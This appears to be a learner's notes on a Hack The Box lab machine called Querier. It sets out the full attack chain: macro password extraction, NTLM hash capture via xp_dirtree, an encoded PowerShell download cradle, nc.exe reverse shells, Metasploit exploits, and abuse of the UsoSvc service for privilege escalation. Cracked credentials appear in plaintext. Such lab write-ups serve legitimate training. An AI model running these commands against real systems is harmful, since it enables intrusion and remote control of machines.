SQL server and SMB
Start responder to try to catch the NTLM Hash
Check SMB > get XLSM file
open it with visual basic and get a password and the author of file:
luis:PcwTWTHRwryjc$c6luis didn’t work. What did he do?
He used binwalk:
binwalk "Currency Volume Report.xlsm"What else can it do?
binwalk --helpWe wanna extract the files inside:
binwalk -e "Currency Volume Report.xlsm"cat the bin:
He ended up getting the same thing. What I missed:
“Uid” was the username, not luis.
It didn’t let me login. How he did it: Connect to the mssql using mssqlclient.py
mssqlclient.py QUERIER/reporting:'PcwTWTHRwryjc$c6'@10.10.10.125 -windows-authWe want to try to get a shell. Since it’s disabled, we can force pull hashes. How?
Make sure responder in running and:
exec xp_dirtree '\\10.10.14.13\share\',1,1Responder will pull a hash
Cracked password:
corporate568metasploit?
search psexec
use 4 #(exploit smb psexec) #number changed? windows/smb/psexec
set payload windows/x64/meterpreter/reverse_tcp
set rhosts 10.10.10.125
set smbdomain QUERIER
set smbuser mssql-svc
set smbpass corporate568
options #to review everything
show targetspsexec.py:
psexec.py QUERIER/mssql-svc:'corporate568'@10.10.10.125No admin access.
Redo the steps with the new credentials!
mssqlclient.py QUERIER/mssql-svc:'corporate568'@10.10.10.125 -windows-authwe can get shell now
we got systeminfo. Run it thru WES:
CD there:
cd /opt/./windows-exploit-suggester.py --database 2024-04-09-mssb.xls --systeminfo /home/kali/Desktop/HackTheBox/Querier/systeminfo.txt -o Microsoft Windows Server 2019 Standard 10.0.17763 N/A Build 17763nothing. Send over PowerUp?
certutil -urlcache -f http://10.10.14.13/PowerUp.ps1 PowerUp.ps1We have impersonate priv:
xp_cmdshell 'powershell.exe -nop -w hidden -e WwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAUwBlAGMAdQByAGkAdAB5AFAAcgBvAHQAbwBjAG8AbAA9AFsATgBlAHQALgBTAGUAYwB1AHIAaQB0AHkAUAByAG8AdABvAGMAbwBsAFQAeQBwAGUAXQA6ADoAVABsAHMAMQAyADsAJAB2AEgAWgBhAGMAPQBuAGUAdwAtAG8AYgBqAGUAYwB0ACAAbgBlAHQALgB3AGUAYgBjAGwAaQBlAG4AdAA7AGkAZgAoAFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAFAAcgBvAHgAeQBdADoAOgBHAGUAdABEAGUAZgBhAHUAbAB0AFAAcgBvAHgAeQAoACkALgBhAGQAZAByAGUAcwBzACAALQBuAGUAIAAkAG4AdQBsAGwAKQB7ACQAdgBIAFoAYQBjAC4AcAByAG8AeAB5AD0AWwBOAGUAdAAuAFcAZQBiAFIAZQBxAHUAZQBzAHQAXQA6ADoARwBlAHQAUwB5AHMAdABlAG0AVwBlAGIAUAByAG8AeAB5ACgAKQA7ACQAdgBIAFoAYQBjAC4AUAByAG8AeAB5AC4AQwByAGUAZABlAG4AdABpAGEAbABzAD0AWwBOAGUAdAAuAEMAcgBlAGQAZQBuAHQAaQBhAGwAQwBhAGMAaABlAF0AOgA6AEQAZQBmAGEAdQBsAHQAQwByAGUAZABlAG4AdABpAGEAbABzADsAfQA7AEkARQBYACAAKAAoAG4AZQB3AC0AbwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQAwAC4AMQAwAC4AMQA0AC4AMQAzADoAOAAwADgAMAAvAGUAQwBGADQAOQBiAE0AeQBLAC8AWgA1AGkAbgBGAHAARgBmAHIAdgAnACkAKQA7AEkARQBYACAAKAAoAG4AZQB3AC0AbwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQAwAC4AMQAwAC4AMQA0AC4AMQAzADoAOAAwADgAMAAvAGUAQwBGADQAOQBiAE0AeQBLACcAKQApADsA'- needs to be without quotes
- too long
Try metasploit ith the one that worked?
xp_cmdshell powershell.exe -nop -w hidden -e WwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAUwBlAGMAdQByAGkAdAB5AFAAcgBvAHQAbwBjAG8AbAA9AFsATgBlAHQALgBTAGUAYwB1AHIAaQB0AHkAUAByAG8AdABvAGMAbwBsAFQAeQBwAGUAXQA6ADoAVABsAHMAMQAyADsAJAB2AEgAWgBhAGMAPQBuAGUAdwAtAG8AYgBqAGUAYwB0ACAAbgBlAHQALgB3AGUAYgBjAGwAaQBlAG4AdAA7AGkAZgAoAFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAFAAcgBvAHgAeQBdADoAOgBHAGUAdABEAGUAZgBhAHUAbAB0AFAAcgBvAHgAeQAoACkALgBhAGQAZAByAGUAcwBzACAALQBuAGUAIAAkAG4AdQBsAGwAKQB7ACQAdgBIAFoAYQBjAC4AcAByAG8AeAB5AD0AWwBOAGUAdAAuAFcAZQBiAFIAZQBxAHUAZQBzAHQAXQA6ADoARwBlAHQAUwB5AHMAdABlAG0AVwBlAGIAUAByAG8AeAB5ACgAKQA7ACQAdgBIAFoAYQBjAC4AUAByAG8AeAB5AC4AQwByAGUAZABlAG4AdABpAGEAbABzAD0AWwBOAGUAdAAuAEMAcgBlAGQAZQBuAHQAaQBhAGwAQwBhAGMAaABlAF0AOgA6AEQAZQBmAGEAdQBsAHQAQwByAGUAZABlAG4AdABpAGEAbABzADsAfQA7AEkARQBYACAAKAAoAG4AZQB3AC0AbwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQAwAC4AMQAwAC4AMQA0AC4AMQAzADoAOAAwADgAMAAvAGUAQwBGADQAOQBiAE0AeQBLAC8AWgA1AGkAbgBGAHAARgBmAHIAdgAnACkAKQA7AEkARQBYACAAKAAoAG4AZQB3AC0AbwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQAwAC4AMQAwAC4AMQA0AC4AMQAzADoAOAAwADgAMAAvAGUAQwBGADQAOQBiAE0AeQBLACcAKQApADsAwoooo it worked!!
get meterpreter session 1:
sessions 1Get info:
getuid
sysinfo
getprivsRun meterpreter suggester:
run post/multi/recon/local_exploit_suggesterVulnerable to a familiar one:
[+] 10.10.10.125 - exploit/windows/local/ms16_075_reflection: The target appears to be vulnerable.
Use reflection:
background
#didn't workCheck tokens that we can impersonate:
load incognito
list_tokens -uNone
Test the rest of the exploits metasploit suggester gave:
use exploit/windows/local/cve_2021_40449^this worked
if non worked, I could’ve gone the manual route with nc.exe + msfvenom shell
session 2
getuid
shellGet flags
$$$$$$$$$$$$$$$WHAT I DID WRONG$$$$$$$$$$$$$$$$$$$
I didn’t notice Uid (username) and tried the wrong username
when thing didn’t work out, I didn’t go back and try new credentials for direct access (mssqlclient)
I needed to fix syntax (quotes/no quotes) in the xp_cmdshell
Forgot to just try getsystem when I got a meterpreter shell (it would have worked)
####################WHAT HE DID##################
try my own shell:
send over nc.exe:
How to copy nc to folder:
cp /home/kali/nc.exe /home/kali/transfer xp_cmdshell powershell Invoke-WebRequest "http://10.10.14.13/nc.exe" -OutFile "C:\Reports\nc.exe"What he did:
He made his own shell
xp_cmdshell 'powershell Invoke-WebRequest "http://10.10.14.13/nc.exe" -OutFile "C:\Reports\nc.exe"'
xp_cmdshell powershell -c Invoke-WebRequest "http://10.10.14.13/nc.exe" -OutFile "C:\Reports\nc.exe"connect back:
Open listener:
nc -nvlp 4444connect:
xp_cmdshell C:\Reports\nc.exe 10.10.14.13 4444 -e cmd.exeHost PowerUp or Sherlock with the auto run added to the end of them and run the echo command:
echo IEX(New-Object Net.WebClient).DownloadString('http://10.10.14.13:80/Sherlock.ps1') | powershell -noprofile -It found UsoSvc
what is it?
sc qc UsoSvc
You can edit the binary path
Method 1:
Using the abuse method from PowerUp:
Invoke-ServiceUserAddMethod 2:
editing the binary:
sc config UsoSvc binpath= "C:\Reports\nc.exe 10.10.14.13 5555 -e cmd.exe"Needs a different port than the one we’re currently connected on
Double check that it got edited:
sc qc UsoSvcopen nc listener:
nc -nvlp 5555stop and start:
sc stop UsoSvc & sc start UsoSvcNote: This also had GPP pass